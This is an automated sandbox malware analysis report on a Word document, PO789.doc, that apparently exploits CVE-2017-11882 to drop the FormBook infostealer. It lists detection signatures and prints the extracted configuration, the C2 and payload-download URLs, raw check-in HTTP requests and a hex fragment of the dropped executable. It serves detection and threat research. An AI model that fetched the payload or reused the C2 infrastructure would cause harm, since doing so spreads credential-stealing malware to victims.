Windows Analysis Report PO789.doc

Overview

General Information

Sample Name: PO789.doc
Analysis ID: 552782
MD5: 6c28e31d32e97db724188025636ac25e
SHA1: c5818d1883785293dfab00d2c1389b82cc74ad60
SHA256: c24d7ca6493677f640cf6d4a90c746f949749f46e45873d77a71b94ab707a21f
Tags: docFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.carbonfiber.cloud/md4m/"], "decoy": ["thegreenroomak.net", "boxingforfitness.info", "hynejubelured.com", "elektrocentralybenza.online", "getinteriorsolution.com", "ajctrade.ltd", "boytoyporn.com", "charlotteetlachocolaterie.fr", "martens-suomi.com", "colesfax.com", "laksmanawarehouse.com", "extraordinarymiracle.com", "hunttools.info", "ofertasdesuvsinfosmex.com", "banphimipad.com", "jingjiguanchabao.com", "keepourassets.com", "haveitmore.com", "bleuredmedia.com", "hsgerontech.com", "mms05.xyz", "994671.com", "xsbjbj.com", "syxinyu.com", "costnergroups.com", "muzicalbox.com", "kkstudy.net", "picguru.pro", "avtokitai.store", "artplay.xyz", "4-sidedirect.com", "wa1315.xyz", "pelicancrs.com", "cozastore.net", "maatia.com", "movistar.money", "clickprintus.com", "oblatz.com", "mood-room.com", "erisibu85.com", "bzhjxf.com", "mdcomfortukraine.store", "timo-music.com", "vinovai.xyz", "danielkcarter.store", "segurodevidacovid.com", "somoslaostra.com", "businessis.business", "wholisticard.com", "dummydomain234543.com", "realstakepool.com", "rs23.club", "emobilemarket.com", "mabsfuse.com", "lastra41.com", "safbilgi.com", "prestigiousuniforms.com", "outerverse.space", "formuladushi.online", "yt3013.xyz", "therestaurant.menu", "lentellas.com", "rutube.cloud", "mywhitelotus.com"]}
Multi AV Scanner detection for submitted file
Source: PO789.doc Virustotal: Detection: 57% Perma Link
Source: PO789.doc ReversingLabs: Detection: 53%
Yara detected FormBook
Source: Yara match File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://peak-tv.tk/medicomzx.exe Avira URL Cloud: Label: malware
Source: http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i Avira URL Cloud: Label: malware
Source: http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: peak-tv.tk Virustotal: Detection: 5% Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe Metadefender: Detection: 34% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Metadefender: Detection: 34% Perma Link
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe ReversingLabs: Detection: 51%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.0.medicomsh78694.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.medicomsh78694.exe.400000.9.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.medicomsh78694.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.medicomsh78694.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe Jump to behavior
Document contains Microsoft Equation 3.0 OLE entries
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr Stream path '_1703602930/\x1CompObj' : ...........................F....Microsoft Equation
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000003.421954083.0000000000540000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460764763.0000000000D20000.00000040.00000001.sdmp, medicomsh78694.exe, 00000005.00000003.422999608.00000000006A0000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, msdt.exe
Source: Binary string: msdt.pdb source: medicomsh78694.exe, 00000005.00000003.458755540.0000000002800000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.461556761.0000000002700000.00000040.00020000.sdmp, medicomsh78694.exe, 00000005.00000003.458361756.0000000002700000.00000004.00000001.sdmp

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: peak-tv.tk
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0037BA28
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0037BAD8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0037BBC8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0037BA18
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0037BAC8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0037BBC0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_0044F2A8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then pop ebx 5_2_00406ABB
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then pop edi 5_2_0040C41C
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then pop edi 5_2_0041566C
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then pop edi 5_2_004156A7
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 2.58.149.41:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 2.58.149.41:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.muzicalbox.com
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.13 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.extraordinarymiracle.com
Source: C:\Windows\explorer.exe Domain query: www.realstakepool.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 109.94.209.123 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.prestigiousuniforms.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.carbonfiber.cloud/md4m/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GBTCLOUDUS GBTCLOUDUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1Host: www.prestigiousuniforms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1Host: www.muzicalbox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1Host: www.extraordinarymiracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1Host: www.realstakepool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 2.58.149.41 2.58.149.41
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Jan 2022 17:17:00 GMTServer: ApacheLast-Modified: Tue, 11 Jan 2022 16:19:34 GMTETag: "aca00-5d550d19904c2"Accept-Ranges: bytesContent-Length: 707072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 9c dd 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 b4 0a 00 00 14 00 00 00 00 00 00 d6 d2 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 d2 0a 00 4f 00 00 00 00 e0 0a 00 a8 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc b2 0a 00 00 20 00 00 00 b4 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 10 00 00 00 e0 0a 00 00 12 00 00 00 b6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 c8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 d2 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 0c f4 01 00 18 bb 02 00 03 00 00 00 cb 02 00 06 24 af 04 00 60 23 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 22 00 00 0a 2a 26 00 02 28 23 00 00 0a 00 2a ce 73 24 00 00 0a 80 01 00 00 04 73 25 00 00 0a 80 02 00 00 04 73 26 00 00 0a 80 03 00 00 04 73 27 00 00 0a 80 04 00 00 04 73 28 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 29 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 2e 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2f 00 00 0a 6f 30 00 00 0a 73 31 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /medicomzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: peak-tv.tkConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Jan 2022 17:18:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 179X-Sorting-Hat-ShopId: 59690647732X-Dc: gcp-europe-west1X-Request-ID: e3e3ac4d-8382-4b00-a294-d0a023d81b81X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6cd048db19b64333-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 13 Jan 2022 17:18:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://led24.de/iconset/
Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://p.yusukekamiyamane.com/
Source: explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.427812098.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://splashyfish.com/icons/
Source: explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.513680511.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427688926.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.448802217.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.513680511.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427688926.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431896377.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.448802217.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
